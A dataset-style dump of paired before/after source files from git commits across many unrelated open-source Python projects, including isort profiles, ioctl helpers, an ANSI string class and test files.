whitelist.add(TimeoutError, SystemExit)
assert whitelist.errors == set([Exception, RuntimeError,
TimeoutError, SystemExit])
def test_error_whitelist_invalid():
whitelist = ErrorWhitelist()
with pytest.raises(TypeError):
whitelist.errors = dict()
with pytest.raises(TypeError):
whitelist.errors = None
with pytest.raises(TypeError):
whitelist.add(None)
with pytest.raises(TypeError):
whitelist.add(dict())
class NoRetryError(NotRetriableError):
pass
class RetryError(NotRetriableError):
__retry__ = True
@pytest.mark.parametrize("error,expected", [
(SystemExit(), True),
(ImportError(), True),
(ReferenceError(), True),
(SyntaxError(), True),
(KeyboardInterrupt(), True),
(NotRetriableError(), True),
(NoRetryError(), True),
(RetryError(), False),
(ReferenceError(), True),
(Exception(), False),
(RuntimeError(), False),
(TypeError(), False),
(ValueError(), False),
])
def test_error_whitelist_iswhitedlisted(error, expected):
assert ErrorWhitelist().iswhitelisted(error) is expected
| mit | Python |
f000504c624e3b07a0df4c823a2f422dc1294ed9 | fix test case | icoxfog417/mlimages | testss/test_training.py | testss/test_training.py | import os
from unittest import TestCase
from mlimages.model import ImageProperty
from mlimages.training import TrainingData
import testss.env as env
class TestLabel(TestCase):
def test_make_mean(self):
td = self.get_testdata()
mean_image_file = os.path.join(os.path.dirname(td.label_file.path), "mean_image.png")
pre_fetch = list(td.label_file.fetch())
pre_path = td.label_file.path
td.make_mean_image(mean_image_file)
self.assertTrue(os.path.isfile(mean_image_file))
generated = list(td.generate())
self.assertEqual(len(pre_fetch), len(generated))
self.assertNotEqual(pre_path, td.label_file.path)
os.remove(mean_image_file)
os.remove(td.label_file.path)
def test_batch(self):
# prepare
td = self.get_testdata()
mean_image_file = os.path.join(os.path.dirname(td.label_file.path), "mean_image.png")
td.make_mean_image(mean_image_file)
# make batch data
td.shuffle()
count = 0
for x, y in td.generate_batches(1):
self.assertEqual((1, 3, 32, 32), x.shape)
self.assertEqual((1,), y.shape)
count += 1
self.assertEqual(env.LABEL_FILE_COUNT, count)
os.remove(mean_image_file)
os.remove(td.label_file.path)
def get_testdata(self):
p = env.get_label_file_path()
img_root = os.path.dirname(p)
prop = ImageProperty(32)
td = TrainingData(p, img_root=img_root, image_property=prop)
return td
| import os
from unittest import TestCase
from mlimages.model import LabelFile, ImageProperty
import testss.env as env
class TestLabel(TestCase):
def test_make_mean(self):
lf = self.get_label_file()
mean_image_file = os.path.join(os.path.dirname(lf.path), "mean_image.png")
imp = ImageProperty(32)
td = lf.to_training_data(imp)
td.make_mean_image(mean_image_file)
self.assertTrue(os.path.isfile(mean_image_file))
lines = list(lf.fetch())
generated = list(td.generate())
self.assertEqual(len(lines), len(generated))
self.assertNotEqual(lf.path, td.label_file.path)
os.remove(mean_image_file)
os.remove(td.label_file.path)
def test_batch(self):
lf = self.get_label_file()
mean_image_file = os.path.join(os.path.dirname(lf.path), "mean_image.png")
imp = ImageProperty(32)
# prepare
td = lf.to_training_data(imp)
td.make_mean_image(mean_image_file)
# make batch data
td.shuffle()
count = 0
for x, y in td.generate_batches(1):
self.assertEqual((1, 3, 32, 32), x.shape)
self.assertEqual((1,), y.shape)
count += 1
self.assertEqual(env.LABEL_FILE_COUNT, count)
os.remove(mean_image_file)
os.remove(td.label_file.path)
def get_label_file(self):
p = env.get_label_file_path()
img_root = os.path.dirname(p)
lf = LabelFile(p, img_root=img_root)
return lf
| mit | Python |
eadec2e53404407a7f40df483d1f3d75b599a667 | Fix PID location | XENON1T/cax,XENON1T/cax | cax/main.py | cax/main.py | from cax.tasks import checksum, clear, copy
import os
import sys
import logging
import time
from cax.config import password
import daemonocle
def main2():
password() # Check password specified
logging.basicConfig(filename='example.log',
level=logging.DEBUG,
format='%(asctime)s [%(levelname)s] %(message)s')
logging.info('Daemon is starting')
tasks = [checksum.AddChecksum(),
checksum.CompareChecksums(),
clear.ClearDAQBuffer(),
copy.SCPPush()]
while True:
for task in tasks:
logging.info("Executing %s." % task.__class__.__name__)
task.go()
logging.debug('Sleeping.')
time.sleep(10)
def main():
password() # Check password specified
daemon = daemonocle.Daemon(worker=main,
pidfile=os.path.join(os.path.expanduser("~"),
'cax.pid'))
daemon.do_action(sys.argv[1])
if __name__ == '__main__':
main2()
| from cax.tasks import checksum, clear, copy
import os
import sys
import logging
import time
from cax.config import password
import daemonocle
def main2():
password() # Check password specified
logging.basicConfig(filename='example.log',
level=logging.DEBUG,
format='%(asctime)s [%(levelname)s] %(message)s')
logging.info('Daemon is starting')
tasks = [checksum.AddChecksum(),
checksum.CompareChecksums(),
clear.ClearDAQBuffer(),
copy.SCPPush()]
while True:
for task in tasks:
logging.info("Executing %s." % task.__class__.__name__)
task.go()
logging.debug('Sleeping.')
time.sleep(10)
def main():
password() # Check password specified
daemon = daemonocle.Daemon(worker=main,
pidfile='cax.pid')
daemon.do_action(sys.argv[1])
if __name__ == '__main__':
main2()
| isc | Python |
61cb2f72d94e8bd771e3130d68f753513e5818d5 | Add lstrip, rstrip, strip methods | msabramo/ansi_str | ansi_str.py | ansi_str.py | import re
_ansi_re = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
def strip_ansi(value):
return _ansi_re.sub('', value)
def len_exclude_ansi(value):
return len(strip_ansi(value))
class ansi_str(str):
"""A str subclass, specialized for strings containing ANSI escapes.
When you call the ``len`` method, it discounts ANSI color escape codes.
This is beneficial, because ANSI color escape codes won't mess up code
that tries to do alignment, padding, printing in columns, etc.
"""
_stripped = None
@property
def stripped(self):
if self._stripped is None:
self._stripped = strip_ansi(self[:])
return self._stripped
def __len__(self, exclude_ansi=True):
if exclude_ansi is False:
return len(self[:])
return len(self.stripped)
def ljust(self, width):
return self.stripped.ljust(width).replace(self.stripped, self)
def rjust(self, width):
return self.stripped.rjust(width).replace(self.stripped, self)
def center(self, width):
return self.stripped.center(width).replace(self.stripped, self)
def lstrip(self):
return ansi_str(super(ansi_str, self).lstrip())
def rstrip(self):
return ansi_str(super(ansi_str, self).rstrip())
def strip(self):
return ansi_str(super(ansi_str, self).strip())
if __name__ == '__main__':
# s = ansi_str('abc')
# print s
# print len(s)
s = ansi_str(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m')
print s
print len(s)
print s.__len__()
print s.__len__(exclude_ansi=False)
print(len_exclude_ansi(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m'))
| import re
_ansi_re = re.compile('\033\[((?:\d|;)*)([a-zA-Z])')
def strip_ansi(value):
return _ansi_re.sub('', value)
def len_exclude_ansi(value):
return len(strip_ansi(value))
class ansi_str(str):
"""A str subclass, specialized for strings containing ANSI escapes.
When you call the ``len`` method, it discounts ANSI color escape codes.
This is beneficial, because ANSI color escape codes won't mess up code
that tries to do alignment, padding, printing in columns, etc.
"""
_stripped = None
@property
def stripped(self):
if self._stripped is None:
self._stripped = strip_ansi(self[:])
return self._stripped
def __len__(self, exclude_ansi=True):
if exclude_ansi is False:
return len(self[:])
return len(self.stripped)
def ljust(self, width):
return self.stripped.ljust(width).replace(self.stripped, self)
def rjust(self, width):
return self.stripped.rjust(width).replace(self.stripped, self)
def center(self, width):
return self.stripped.center(width).replace(self.stripped, self)
if __name__ == '__main__':
# s = ansi_str('abc')
# print s
# print len(s)
s = ansi_str(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m')
print s
print len(s)
print s.__len__()
print s.__len__(exclude_ansi=False)
print(len_exclude_ansi(u'\x1b[32m\x1b[1mSUCCESS\x1b[0m'))
| mit | Python |
bc2c1a9d4c060242db1273e9608c629b2e0243cc | Fix _version.py | bryanwweber/thermostate | thermostate/_version.py | thermostate/_version.py | """The version of thermohw."""
__version_info__ = (0, 4, 1, 'dev0') # type: Tuple[int, int, int, str]
__version__ = '.'.join([str(v) for v in __version_info__ if str(v)])
| """The version of thermohw."""
from typing import Tuple
__version_info__: Tuple[int, int, int, str] = (0, 4, 1, 'dev0')
__version__ = '.'.join([str(v) for v in __version_info__ if str(v)])
| bsd-3-clause | Python |
01674bb349e9850b26aeae212ad77aa992f18ab5 | bump version | OSSystems/lava-server,OSSystems/lava-server,OSSystems/lava-server,Linaro/lava-server,Linaro/lava-server,Linaro/lava-server,Linaro/lava-server | lava_scheduler_app/__init__.py | lava_scheduler_app/__init__.py | # Copyright (C) 2011 Linaro Limited
#
# Author: Michael Hudson-Doyle <[email protected]>
#
# This file is part of LAVA Scheduler.
#
# LAVA Scheduler is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation
#
# LAVA Scheduler is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>.
__version__ = (0, 4, 0, "final", 0)
| # Copyright (C) 2011 Linaro Limited
#
# Author: Michael Hudson-Doyle <[email protected]>
#
# This file is part of LAVA Scheduler.
#
# LAVA Scheduler is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License version 3 as
# published by the Free Software Foundation
#
# LAVA Scheduler is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with LAVA Scheduler. If not, see <http://www.gnu.org/licenses/>.
__version__ = (0, 3, 0, "final", 0)
| agpl-3.0 | Python |
cb5a8ac1b74cdeeea5901bb22d8600ace8f5b6e1 | Allow parsing lists of dictionaries as well as dictionaries in JSON structures | tcmitchell/geni-ch,tcmitchell/geni-ch | tools/json_extractor.py | tools/json_extractor.py | #!/usr/bin/env python
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import json
import sys
def main():
if len(sys.argv) <= 2:
print "Usage: json_extractor.py field filename"
sys.exit(0)
fields = sys.argv[1] # Comma separated
filename = sys.argv[2]
data = open(filename).read()
jdata = json.loads(data)
field_list = fields.split(',')
result = jdata
for field in field_list:
if type(result) == dict:
result = result[field]
elif type(result) == list:
field_parts = field.split('=')
field_name = field_parts[0]
field_value = field_parts[1]
for entry in result:
if entry[field_name] == field_value:
result = entry
break
print result
if __name__ == "__main__":
sys.exit(main())
| #!/usr/bin/env python
# ----------------------------------------------------------------------
# Copyright (c) 2013-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import json
import sys
def main():
if len(sys.argv) <= 2:
print "Usage: json_extractor.py field filename"
sys.exit(0)
fields = sys.argv[1] # Comma separated
filename = sys.argv[2]
data = open(filename).read()
jdata = json.loads(data)
field_list = fields.split(',')
result = jdata
for field in field_list:
result = result[field]
print result
if __name__ == "__main__":
sys.exit(main())
| mit | Python |
df35ebdcebc8704f964d3301004fcaf88e70336f | fix filereader cd:/ replacement | commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot,commaai/openpilot | tools/lib/filereader.py | tools/lib/filereader.py | import os
from tools.lib.url_file import URLFile
DATA_PREFIX = os.getenv("DATA_PREFIX", "http://data-raw.internal/")
def FileReader(fn, debug=False):
if fn.startswith("cd:/"):
fn = fn.replace("cd:/", DATA_PREFIX)
if fn.startswith("http://") or fn.startswith("https://"):
return URLFile(fn, debug=debug)
return open(fn, "rb")
| import os
from tools.lib.url_file import URLFile
DATA_PREFIX = os.getenv("DATA_PREFIX", "http://data-raw.internal/")
def FileReader(fn, debug=False):
if fn.startswith("cd:/"):
fn.replace("cd:/", DATA_PREFIX)
if fn.startswith("http://") or fn.startswith("https://"):
return URLFile(fn, debug=debug)
return open(fn, "rb")
| mit | Python |
ab78bf2c47a8bec5c1d0c5a7951dba1c98f5c28e | Revert file to moneymanager master branch. | moneymanagerex/general-reports,moneymanagerex/general-reports | check_gm.py | check_gm.py | #!/usr/bin/env python3
# vi:tabstop=4:expandtab:shiftwidth=4:softtabstop=4:autoindent:smarttab
import os, sys
import sqlite3
import urllib.request
err = False
for version in range (7, 14):
fname = 'tables_v1.sql' if version < 12 else 'tables.sql'
url = 'https://cdn.jsdelivr.net/gh/moneymanagerex/database@v%i/%s' % (version, fname)
schema = urllib.request.urlopen(url).read().decode('utf-8')
db = sqlite3.connect(':memory:')
db.executescript(schema)
print('\nTesting reports with MMEX db schema v%i:' % version)
print('-' * 40)
for root, dirs, files in os.walk('.'):
for sql in files:
if sql=='sqlcontent.sql':
try: db.executescript(open(os.path.join(root, sql)).read())
except sqlite3.Error as e:
print('ERR', os.path.basename(root).ljust(40), e.args[0])
err = True
else:
print('OK ', os.path.basename(root))
db.rollback()
db.close()
if err: sys.exit(1)
| #!/usr/bin/env python3
# vi:tabstop=4:expandtab:shiftwidth=4:softtabstop=4:autoindent:smarttab
import os, sys
import sqlite3
import urllib.request
err = False
for version in range (7, 14):
fname = 'tables_v1.sql' if version < 12 else 'tables.sql'
url = 'https://cdn.jsdelivr.net/gh/moneymanagerex/database@v%i/%s' % (version, fname)
schema = urllib.request.urlopen(url).read().decode('utf-8')
db = sqlite3.connect(':memory:')
db.executescript(schema)
print('\nTesting reports with MMEX db schema v%i:' % version)
print('-' * 40)
for root, dirs, files in os.walk('.'):
for sql in files:
if sql=='sqlcontent.sql':
try: db.executescript(open(os.path.join(root, sql)).read())
except sqlite3.Error as e:
print('ERR', os.path.basename(root).ljust(40), e.args[0])
err = True
else:
print('OK ', os.path.basename(root))
db.rollback()
db.close()
if err: sys.exit(1) | mit | Python |
81bd4c6a7b94803e57a64f47bacbf3d5059282bd | add node | HeyIamJames/CodingInterviewPractice,HeyIamJames/CodingInterviewPractice | checkbst.py | checkbst.py | """
This is a very common interview question.
Given a binary tree, check whether it’s a binary
search tree or not. Simple as that..
http://www.ardendertat.com/2011/10/10/programming-interview-questions-7-binary-search-tree-check/
"""
class Node:
def __init__(self, val=None):
self.left, self.right, self.val = None, None, val | """
This is a very common interview question.
Given a binary tree, check whether it’s a binary
search tree or not. Simple as that..
http://www.ardendertat.com/2011/10/10/programming-interview-questions-7-binary-search-tree-check/
"""
| mit | Python |
175bbd2f181d067712d38beeca9df4063654103a | Update script to remove extension from filename | WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln,WhatWorksWhenForWhom/nlppln | nlppln/frog_to_saf.py | nlppln/frog_to_saf.py | #!/usr/bin/env python
import click
import os
import codecs
import json
from xtas.tasks._frog import parse_frog, frog_to_saf
@click.command()
@click.argument('input_files', nargs=-1, type=click.Path(exists=True))
@click.argument('output_dir', nargs=1, type=click.Path())
def frog2saf(input_files, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
for fi in input_files:
with codecs.open(fi) as f:
lines = f.readlines()
lines = [line.strip() for line in lines]
saf_data = frog_to_saf(parse_frog(lines))
head, tail = os.path.split(fi)
fname = tail.replace(os.path.splitext(tail)[1], '')
out_file = os.path.join(output_dir, '{}.json'.format(fname))
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
json.dump(saf_data, f, indent=4)
if __name__ == '__main__':
frog2saf()
| #!/usr/bin/env python
import click
import os
import codecs
import json
from xtas.tasks._frog import parse_frog, frog_to_saf
@click.command()
@click.argument('input_files', nargs=-1, type=click.Path(exists=True))
@click.argument('output_dir', nargs=1, type=click.Path())
def frog2saf(input_files, output_dir):
if not os.path.exists(output_dir):
os.makedirs(output_dir)
for fi in input_files:
with codecs.open(fi) as f:
lines = f.readlines()
lines = [line.strip() for line in lines]
saf_data = frog_to_saf(parse_frog(lines))
head, tail = os.path.split(fi)
out_file = os.path.join(output_dir, '{}.json'.format(tail))
with codecs.open(out_file, 'wb', encoding='utf-8') as f:
json.dump(saf_data, f, indent=4)
if __name__ == '__main__':
frog2saf()
| apache-2.0 | Python |
b3426bcd217c336f8807a5474b47dea72a994eb9 | Rename `op`-parameter to `request`. | olavmrk/python-ioctl,olavmrk/python-ioctl | ioctl/__init__.py | ioctl/__init__.py | import ctypes
import fcntl
import sys
# In Python 2, the bytearray()-type does not support the buffer interface,
# and can therefore not be used in ioctl().
# This creates a couple of helper functions for converting to and from
if sys.version_info < (3, 0):
import array
def _to_bytearray(value):
return array.array('B', value)
def _from_bytearray(value):
return value.tostring()
else:
def _to_bytearray(value):
return bytearray(value)
def _from_bytearray(value):
return bytes(value)
def ioctl_int(fd, request, value=0):
"""Call ioctl() with an `int *` argument.
:param fd: File descriptor to operate on.
:param request: The ioctl request to call.
:param value: Optional value to pass to the ioctl() operation. Defaults to 0.
:return The contents of the value parameter after the call to ioctl().
"""
res = ctypes.c_int(value)
fcntl.ioctl(fd, request, res)
return res.value
def ioctl_size_t(fd, request, value=0):
"""Call ioctl() with a `size_t *` argument.
:param fd: File descriptor to operate on.
:param request: ioctl request to call.
:param value: Optional value to pass to the ioctl() operation. Defaults to 0.
:return: The contents of the value parameter after the call to ioctl().
"""
res = ctypes.c_size_t(value)
fcntl.ioctl(fd, request, res)
return res.value
def ioctl_buffer(fd, request, value=None, length=None):
"""Call ioctl() with a byte buffer argument.
You must specify either the `value` parameter or the `length` parameter.
If the `length` parameter is specified, this function will allocate a byte
buffer of the specified length to pass to ioctl().
:param fd: File descriptor to operate on.
:param request: ioctl request to call.
:param value: Optional contents of the byte buffer at the start of the call.
:param length: Optional length of the byte buffer.
:return: The contents of the value parameter after the call to ioctl().
"""
request = int(request)
if value is None and length is None:
raise ValueError('Must specify either `value` or `length`')
if value is not None and length is not None:
raise ValueError('Cannot specify both `value` and `length`')
if value is None:
value = [0] * length
data = _to_bytearray(value)
fcntl.ioctl(fd, request, data)
data = _from_bytearray(data)
return data
| import ctypes
import fcntl
import sys
# In Python 2, the bytearray()-type does not support the buffer interface,
# and can therefore not be used in ioctl().
# This creates a couple of helper functions for converting to and from
if sys.version_info < (3, 0):
import array
def _to_bytearray(value):
return array.array('B', value)
def _from_bytearray(value):
return value.tostring()
else:
def _to_bytearray(value):
return bytearray(value)
def _from_bytearray(value):
return bytes(value)
def ioctl_int(fd, op, value=0):
"""Call ioctl() with an `int *` argument.
:param fd: File descriptor to operate on.
:param op: The ioctl request to call.
:param value: Optional value to pass to the ioctl() operation. Defaults to 0.
:return The contents of the value parameter after the call to ioctl().
"""
res = ctypes.c_int(value)
fcntl.ioctl(fd, op, res)
return res.value
def ioctl_size_t(fd, op, value=0):
"""Call ioctl() with a `size_t *` argument.
:param fd: File descriptor to operate on.
:param op: ioctl request to call.
:param value: Optional value to pass to the ioctl() operation. Defaults to 0.
:return: The contents of the value parameter after the call to ioctl().
"""
res = ctypes.c_size_t(value)
fcntl.ioctl(fd, op, res)
return res.value
def ioctl_buffer(fd, op, value=None, length=None):
"""Call ioctl() with a byte buffer argument.
You must specify either the `value` parameter or the `length` parameter.
If the `length` parameter is specified, this function will allocate a byte
buffer of the specified length to pass to ioctl().
:param fd: File descriptor to operate on.
:param op: ioctl request to call.
:param value: Optional contents of the byte buffer at the start of the call.
:param length: Optional length of the byte buffer.
:return: The contents of the value parameter after the call to ioctl().
"""
op = int(op)
if value is None and length is None:
raise ValueError('Must specify either `value` or `length`')
if value is not None and length is not None:
raise ValueError('Cannot specify both `value` and `length`')
if value is None:
value = [0] * length
data = _to_bytearray(value)
fcntl.ioctl(fd, op, data)
data = _from_bytearray(data)
return data
| mit | Python |
0ac4fe1431fd04aa2645a4afc3d4d2fbfb21bb90 | Update plone profile: copy of black, plus three settings. | PyCQA/isort,PyCQA/isort | isort/profiles.py | isort/profiles.py | """Common profiles are defined here to be easily used within a project using --profile {name}"""
from typing import Any, Dict
black = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"ensure_newline_before_comments": True,
"line_length": 88,
}
django = {
"combine_as_imports": True,
"include_trailing_comma": True,
"multi_line_output": 5,
"line_length": 79,
}
pycharm = {
"multi_line_output": 3,
"force_grid_wrap": 2,
"lines_after_imports": 2,
}
google = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
"single_line_exclusions": ("typing",),
"order_by_type": False,
"group_by_package": True,
}
open_stack = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
}
plone = black.copy()
plone.update(
{
"force_alphabetical_sort": True,
"force_single_line": True,
"lines_after_imports": 2,
}
)
attrs = {
"atomic": True,
"force_grid_wrap": 0,
"include_trailing_comma": True,
"lines_after_imports": 2,
"lines_between_types": 1,
"multi_line_output": 3,
"use_parentheses": True,
}
hug = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"line_length": 100,
}
wemake = {
"multi_line_output": 3,
"include_trailing_comma": True,
"use_parentheses": True,
"line_length": 80,
}
appnexus = {
**black,
"force_sort_within_sections": True,
"order_by_type": False,
"case_sensitive": False,
"reverse_relative": True,
"sort_relative_in_force_sorted_sections": True,
"sections": ["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
"no_lines_before": "LOCALFOLDER",
}
profiles: Dict[str, Dict[str, Any]] = {
"black": black,
"django": django,
"pycharm": pycharm,
"google": google,
"open_stack": open_stack,
"plone": plone,
"attrs": attrs,
"hug": hug,
"wemake": wemake,
"appnexus": appnexus,
}
| """Common profiles are defined here to be easily used within a project using --profile {name}"""
from typing import Any, Dict
black = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"ensure_newline_before_comments": True,
"line_length": 88,
}
django = {
"combine_as_imports": True,
"include_trailing_comma": True,
"multi_line_output": 5,
"line_length": 79,
}
pycharm = {
"multi_line_output": 3,
"force_grid_wrap": 2,
"lines_after_imports": 2,
}
google = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
"single_line_exclusions": ("typing",),
"order_by_type": False,
"group_by_package": True,
}
open_stack = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
}
plone = {
"force_alphabetical_sort": True,
"force_single_line": True,
"lines_after_imports": 2,
"line_length": 200,
}
attrs = {
"atomic": True,
"force_grid_wrap": 0,
"include_trailing_comma": True,
"lines_after_imports": 2,
"lines_between_types": 1,
"multi_line_output": 3,
"use_parentheses": True,
}
hug = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"line_length": 100,
}
wemake = {
"multi_line_output": 3,
"include_trailing_comma": True,
"use_parentheses": True,
"line_length": 80,
}
appnexus = {
**black,
"force_sort_within_sections": True,
"order_by_type": False,
"case_sensitive": False,
"reverse_relative": True,
"sort_relative_in_force_sorted_sections": True,
"sections": ["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
"no_lines_before": "LOCALFOLDER",
}
profiles: Dict[str, Dict[str, Any]] = {
"black": black,
"django": django,
"pycharm": pycharm,
"google": google,
"open_stack": open_stack,
"plone": plone,
"attrs": attrs,
"hug": hug,
"wemake": wemake,
"appnexus": appnexus,
}
| mit | Python |
0a4da4bc40813362b9d6c67c2fb02f33a807f3fe | fix error on tax view | iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP | l10n_it_account/__openerp__.py | l10n_it_account/__openerp__.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2013 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Italian Localisation',
'version': '2.15.30.32',
'category': 'Localisation/Italy',
'description': """This module customizes OpenERP in order to fit italian laws and mores - Account version
Functionalities:
- Fiscal code computation for partner, and fiscal code check
- Check invoice date consistency
- CIG on invoice
""",
'author': 'OpenERP Italian Community, Didotech srl',
'website': 'http://www.openerp-italia.org, http://www.didotech.com',
'license': 'AGPL-3',
'depends': [
'account',
'base_vat',
'account_chart',
'base_iban',
'l10n_it_base',
'account_voucher',
'sale_order_confirm',
# 'account_invoice_entry_date', not possible for use of a field defined here invoice_supplier_number
],
'data': [
'account/partner_view.xml',
'account/fiscal_position_view.xml',
'account/account_sequence.xml',
'account/invoice_view.xml',
'account/voucher_view.xml',
'account/payment_type_view.xml',
'wizard/select_fiscal_position_view.xml',
'data/bank_iban_data.xml',
'account/account_move.xml',
'account/res_bank_view.xml',
'account/account_tax_view.xml',
'account/res_company_view.xml',
'account/account_invoice_workflow.xml',
],
'demo': [],
'active': False,
'installable': True,
'external_dependencies': {
'python': ['codicefiscale'],
}
}
| # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2013 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Italian Localisation',
'version': '2.15.30.32',
'category': 'Localisation/Italy',
'description': """This module customizes OpenERP in order to fit italian laws and mores - Account version
Functionalities:
- Fiscal code computation for partner, and fiscal code check
- Check invoice date consistency
- CIG on invoice
""",
'author': 'OpenERP Italian Community, Didotech srl',
'website': 'http://www.openerp-italia.org, http://www.didotech.com',
'license': 'AGPL-3',
'depends': [
'account',
'base_vat',
'account_chart',
'base_iban',
'l10n_it_base',
'account_voucher',
'sale_order_confirm',
# 'account_invoice_entry_date', not possible for use of a field defined here invoice_supplier_number
],
'data': [
'account/partner_view.xml',
'account/fiscal_position_view.xml',
'account/account_sequence.xml',
'account/invoice_view.xml',
'account/voucher_view.xml',
'account/payment_type_view.xml',
'wizard/select_fiscal_position_view.xml',
'data/bank_iban_data.xml',
'account/account_move.xml',
'account/res_bank_view.xml',
# 'account/account_tax_view.xml',
'account/res_company_view.xml',
'account/account_invoice_workflow.xml',
],
'demo': [],
'active': False,
'installable': True,
'external_dependencies': {
'python': ['codicefiscale'],
}
}
| agpl-3.0 | Python |